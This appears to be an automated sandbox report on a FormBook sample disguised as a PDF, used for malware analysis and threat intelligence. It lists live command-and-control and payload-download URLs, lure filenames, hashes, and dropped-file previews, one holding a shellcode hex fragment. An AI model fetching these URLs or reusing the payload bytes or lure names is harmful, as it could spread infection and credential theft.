                                                          162.43.105.95SHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.sodnavisystem.com/5mht/?mv0D=Z08L+geXOaCZa14tX+Dce5rz8Tb3SFKzhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWLTcISJV/mUGk7GPA31V4F2pYJx4Wp0unWNc=&Jj=kpS8
                                                          188.114.96.3http://38738d.s3-website.eu-north-1.amazonaws.com/2955133/995291385/c2FtdWVsLmJvZ2VyQGdmLmNvbQ==Get hashmaliciousUnknownBrowse
                                                          • bharatlokmatnews.com/favicon.ico
                                                          INVOICE PAYMENT_Scan0016PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                          • filetransfer.io/data-package/uIv3IIBw/download
                                                          payment advice.exeGet hashmaliciousFormBookBrowse
                                                          • www.coinwab.com/efdt/
                                                          MV ENISHI V.53Y.xlsGet hashmaliciousUnknownBrowse
                                                          • come.ac/70DgR
                                                          PO63972.xlsGet hashmaliciousUnknownBrowse
                                                          • come.ac/ZfN-c
                                                          Purchase Order -JJ023639#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                          • filetransfer.io/data-package/mxhZOu4r/download
                                                          QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                          • filetransfer.io/data-package/zyfg52lT/download
                                                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                          • filetransfer.io/data-package/EQ4IeQyC/download
                                                          QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                          • filetransfer.io/data-package/ygwPva9v/download
                                                          QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                          • filetransfer.io/data-package/uIFkI2gU/download
                                                          37.9.175.173SHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.gymroom.online/9v4b/?mv0D=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&Jj=kpS8
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.gymroom.online/9v4b/?MdEl=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&cv4D=Bv0xSH88iTF48zS0
                                                          arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.gymroom.online/9v4b/?CbPtaF=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&NV=CzkTp6UpmNmd

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.evoolihubs.shopSHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          PO454355 Pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          Quotation List Pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          AirWaybill_Document Pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          www.shaf-kupe-msk.storeSHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 45.130.41.38
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 45.130.41.38
                                                          arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 45.130.41.38
                                                          www.noghteyab.comDocument.exeGet hashmaliciousFormBookBrowse
                                                          • 51.89.93.192
                                                          SHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 51.89.93.193
                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtfGet hashmaliciousFormBookBrowse
                                                          • 46.105.190.248
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 51.89.93.193
                                                          arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 51.89.93.193
                                                          www.hectmalt.xyzSHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.41.207
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.41.207
                                                          arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.41.207

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSARRIVAL NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          https://download.cnet.com/download/wcfstorm/3000-2218_4-10914361.htmlGet hashmaliciousUnknownBrowse
                                                          • 104.19.178.52
                                                          SecuriteInfo.com.Win64.HacktoolX-gen.11863.1266.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.0.5
                                                          https://ik.imagekit.io/gxpn0jo1s/tgearwtyetgwaetgwa4t6w4a6yytyseztsetsetserte.html?updatedAt=3047319305?0595vfs0snhw3jn#4XoKCq127845cDyC289vehxtterqj1617VXBGKGZCTGTHTMC44244/256826q14Get hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          SecuriteInfo.com.Win64.HacktoolX-gen.11863.1266.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.0.5
                                                          https://jobs.softworldinc.comGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFhUV4hji8G1tNbN7GWNRgqNqYemng2PpFVkqXnlInizGtxny_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZMkq8x0xejOvqg0qdKKIxtcx-2BGywLUWl-2Buiu5kjTO2RrwfD9LQHAvbCogNbw7LnfmDAYpmH9emIBdM37OJW7sSXeSn9dRdufPdqH51JJvOJtIpmY2bkNryxnOhVxBv956ezqniWDxNQG1auD6c9Fzvbk7UWS50KG3NjmS1tVxjDCbqAJE3Xf-2B5r1RpfRYd3TGF-2B-2FZsLP26s37yzm5-2BksTv5GtMCcpDEJ5fpnll12DCN7ceYHk9rW2YWLkkQuZ9T2Bs-3DGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          https://mnconsulting.com.au/8537659878_pdf.htmlGet hashmaliciousCVE-2024-21412Browse
                                                          • 104.16.231.132
                                                          https://www.softworldinc.comGet hashmaliciousUnknownBrowse
                                                          • 104.16.117.43
                                                          http://sherwoodhomeshow.comGet hashmaliciousUnknownBrowse
                                                          • 104.18.11.207
                                                          CYBERTRAILSUSsora.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 162.42.122.255
                                                          SHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 162.43.105.95
                                                          NGL 700800.exeGet hashmaliciousFormBookBrowse
                                                          • 162.43.101.114
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 162.43.94.40
                                                          Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
                                                          • 162.43.101.114
                                                          spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                                          • 162.43.101.114
                                                          SOA 020724.exeGet hashmaliciousFormBookBrowse
                                                          • 162.43.101.114
                                                          Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
                                                          • 162.43.101.114
                                                          arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 162.43.94.40
                                                          288292021 ABB.exeGet hashmaliciousFormBookBrowse
                                                          • 162.43.101.114
                                                          PARSONLINETehran-IRANIRSHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 5.78.41.174
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 5.78.41.174
                                                          exe4.bin.bak.exeGet hashmaliciousBlackMoon, GhostRatBrowse
                                                          • 5.78.93.88
                                                          arm5-20240706-0316.elfGet hashmaliciousMiraiBrowse
                                                          • 91.98.88.14
                                                          botx.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 91.98.39.84
                                                          f9DYXBf380.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 46.62.234.74
                                                          http://www.instegeram.ir/Get hashmaliciousUnknownBrowse
                                                          • 31.214.171.171
                                                          http://insig.orgGet hashmaliciousUnknownBrowse
                                                          • 134.255.201.92
                                                          http://insig.orgGet hashmaliciousUnknownBrowse
                                                          • 134.255.201.92
                                                          RpHVKGndFL.elfGet hashmaliciousUnknownBrowse
                                                          • 82.99.248.251
                                                          OVHFRhttps://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObjectGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 51.89.41.105
                                                          https://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObjectGet hashmaliciousUnknownBrowse
                                                          • 51.195.5.198
                                                          crosscheckrosefloweronhairbeauty.gIF.vbsGet hashmaliciousRemcosBrowse
                                                          • 139.99.220.222
                                                          yrBA01LVo2.exeGet hashmaliciousWannacryBrowse
                                                          • 192.99.167.1
                                                          1qPnokLANh.vbsGet hashmaliciousUnknownBrowse
                                                          • 213.186.33.5
                                                          druMBYw2n4.vbsGet hashmaliciousUnknownBrowse
                                                          • 213.186.33.5
                                                          AuTZA3eZbq.vbsGet hashmaliciousUnknownBrowse
                                                          • 213.186.33.5
                                                          ImBrdcY7JB.vbsGet hashmaliciousUnknownBrowse
                                                          • 213.186.33.5
                                                          V-Mail_maryland.gov.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                          • 149.202.238.105
                                                          swCQS5MMLX.rtfGet hashmaliciousRemcosBrowse
                                                          • 139.99.220.222
                                                          WEBSUPPORT-SRO-SK-ASSKSHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 37.9.175.173
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 37.9.175.173
                                                          arrival notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 37.9.175.173
                                                          TERMINI CONTRATTUALI-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          sDS901SDKw.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          WARUNKI UMOWY-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          WARUNKI UMOWY-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          0420-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          _____S__.EXE.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173
                                                          S#U00d6ZLE#U015eME #U015eARTLARI-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                          • 185.111.89.173

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\autD7A1.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\docs_pdf.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):274432
                                                          Entropy (8bit):7.992961635704826
                                                          Encrypted:true
                                                          SSDEEP:6144:vgo2X+76o89IbmP+WtlUYUrfEudy2SwQ4Y/rhCrKSNXa9lNlE9ax:vX2Xbo89VvtlArfBE2nQBC2oK7x
                                                          MD5:BC2BF77D3548E1838A5117E14C263965
                                                          SHA1:7DFD18962E2955698BB0CC503EA3BBD07D743E3C
                                                          SHA-256:51A5D7A777E6D9A21210744F372F6C63507999FF98C0C62D29C1685AF09396D2
                                                          SHA-512:9F9CF8C7D177885575D2878E37050B628972B9CF8A9B9366D27585BE0AF9F6C9E0ED03D3A46FF2618A8EE2D1F09741A187EBAB2495A5C81A316EB6C8810819A6
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..u..5PV2...E....l.2J...M>..2I9YL0N65PV2I9YL0N65PV2I9YL0N6.PV2G&.B0.?.q.3..x.X'E. $].K8!.-W[>9Fi[<lB;X.98..v.l]!RP~[?C.YL0N65P/3@.d,W..U7..)^.V....01.S....Q.J..9+.._V8kR..YL0N65PVb.9Y.1O6@..dI9YL0N65.V0H2XG0N(1PV2I9YL0N.!PV2Y9YL.J65P.2I)YL0L65VV2I9YL0H65PV2I9Y|4N67PV2I9YN0..5PF2I)YL0N&5PF2I9YL0^65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0`BP("2I9.P4N6%PV2W=YL N65PV2I9YL0N65pV2)9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I

                                                          C:\Users\user\AppData\Local\Temp\autD7E0.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\docs_pdf.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9808
                                                          Entropy (8bit):7.603484159825722
                                                          Encrypted:false
                                                          SSDEEP:192:ZyaFcKUr9fp488cPCkTcmkX6R7gcmdlhlFHT+KQTcULdkJwybH4b:3F7Ur9fp48irndbXM9TTBkJwt
                                                          MD5:F394195C78BA42F042223E8A3B74ACC0
                                                          SHA1:BCD7AB9ADC9C52C2611D78E7063C25596C80F546
                                                          SHA-256:39D84B0641A1801009699643D11778D25F758A69514A12E69C50A990570E0F60
                                                          SHA-512:2CDAF4A9D17E9E75B696F9A60EA4AF9340B169DA02F130D971DD401B3F945337B6337BB9C431B71A09972F7C4FBC41C4232CD159F5E7490608E56437A3D8E6FB
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:EA06..pT..f.Y..4.Lf.9..D.P..I..3..h3j..s9..g3...g3..4:..E..&.i..8......D.Ph3...aB.Q..j5.q4.Pf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...|.I..W.d...|vI..W.d...|vK..W.d...|vK(.W.e...|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&

                                                          C:\Users\user\AppData\Local\Temp\jailless

                                                          Download File
                                                          Process:C:\Users\user\Desktop\docs_pdf.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):274432
                                                          Entropy (8bit):7.992961635704826
                                                          Encrypted:true
                                                          SSDEEP:6144:vgo2X+76o89IbmP+WtlUYUrfEudy2SwQ4Y/rhCrKSNXa9lNlE9ax:vX2Xbo89VvtlArfBE2nQBC2oK7x
                                                          MD5:BC2BF77D3548E1838A5117E14C263965
                                                          SHA1:7DFD18962E2955698BB0CC503EA3BBD07D743E3C
                                                          SHA-256:51A5D7A777E6D9A21210744F372F6C63507999FF98C0C62D29C1685AF09396D2
                                                          SHA-512:9F9CF8C7D177885575D2878E37050B628972B9CF8A9B9366D27585BE0AF9F6C9E0ED03D3A46FF2618A8EE2D1F09741A187EBAB2495A5C81A316EB6C8810819A6
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..u..5PV2...E....l.2J...M>..2I9YL0N65PV2I9YL0N65PV2I9YL0N6.PV2G&.B0.?.q.3..x.X'E. $].K8!.-W[>9Fi[<lB;X.98..v.l]!RP~[?C.YL0N65P/3@.d,W..U7..)^.V....01.S....Q.J..9+.._V8kR..YL0N65PVb.9Y.1O6@..dI9YL0N65.V0H2XG0N(1PV2I9YL0N.!PV2Y9YL.J65P.2I)YL0L65VV2I9YL0H65PV2I9Y|4N67PV2I9YN0..5PF2I)YL0N&5PF2I9YL0^65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0`BP("2I9.P4N6%PV2W=YL N65PV2I9YL0N65pV2)9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I9YL0N65PV2I

                                                          C:\Users\user\AppData\Local\Temp\peristeronic

                                                          Download File
                                                          Process:C:\Users\user\Desktop\docs_pdf.exe
                                                          File Type:ASCII text, with very long lines (28756), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):28756
                                                          Entropy (8bit):3.5876462758996204
                                                          Encrypted:false
                                                          SSDEEP:768:4iTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbX+IZ6Gg4vfF3if6gyHp:4iTZ+2QoioGRk6ZklputwjpjBkCiw2Rb
                                                          MD5:8EBFD804D981AB197EC6D1EC5BE9DCED
                                                          SHA1:B71E604E200E2844968886BEAE39B1B46FDC9FE9
                                                          SHA-256:3BD277503FADC45BC469DDE7D3E06B3B647F97FF8B7B559F5849A952359D7002
                                                          SHA-512:4B11139D699D7E09DA6D275D4FB4C39AF3C4F5B99271BF12B7A77BBEE8900F450D208DF1601B6AD53CC74993F003F396DAF925B4E38B68D89E787BF35EEEFFE7
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:1A6E71D4810309FDFC6D43D3E9A6A999A1918E3376ACA2EEC40F44C89B681ADD6AA0260BDF66FE84DA0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                                                          C:\Users\user\AppData\Local\Temp\x1j09f428

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\isoburn.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.149453792818417
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:docs_pdf.exe
                                                          File size:1'193'984 bytes
                                                          MD5:4a7d2fd983aa91d5d3b7bec3c430a825
                                                          SHA1:34d5c4c7e639a9cd89dc857dc2322f3a86962a3e
                                                          SHA256:b193b97622b50825390d67d4bc9ae41c2da72c2c7f2beeb3b9fb0666fe892ae1
                                                          SHA512:d3bd40bbc2e90c6503b2890d6e1c70673497dada3bc28693cee85b4d4192f248827ffba121d455c457b304805b8d0b23ea42717fba7a9d79b1dd6c37788c9b0e
                                                          SSDEEP:24576:cAHnh+eWsN3skA4RV1Hom2KXMmHalp4NWTno7LjUyuDRl5:7h+ZkldoPK8YalCNWzo/CV
                                                          TLSH:6845BE0273D1C036FFABA2739B6AF64156BC79254123852F13981DB9BC701B2267E763
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                          File Icon

                                                          Icon Hash:aaf3e3e3938382a0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x42800a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x668F1447 [Wed Jul 10 23:07:51 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F080CDEDE5Dh
                                                          jmp 00007F080CDE0C14h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F080CDE0D9Ah
                                                          cmp edi, eax
                                                          jc 00007F080CDE10FEh
                                                          bt dword ptr [004C41FCh], 01h
                                                          jnc 00007F080CDE0D99h
                                                          rep movsb
                                                          jmp 00007F080CDE10ACh
                                                          cmp ecx, 00000080h
                                                          jc 00007F080CDE0F64h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007F080CDE0DA0h
                                                          bt dword ptr [004BF324h], 01h
                                                          jc 00007F080CDE1270h
                                                          bt dword ptr [004C41FCh], 00000000h
                                                          jnc 00007F080CDE0F3Dh
                                                          test edi, 00000003h
                                                          jne 00007F080CDE0F4Eh
                                                          test esi, 00000003h
                                                          jne 00007F080CDE0F2Dh
                                                          bt edi, 02h
                                                          jnc 00007F080CDE0D9Fh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007F080CDE0DA3h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007F080CDE0DF5h
                                                          bt esi, 03h

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD5 build 40629
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD5 build 40629

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x59010.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1220000x7134.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

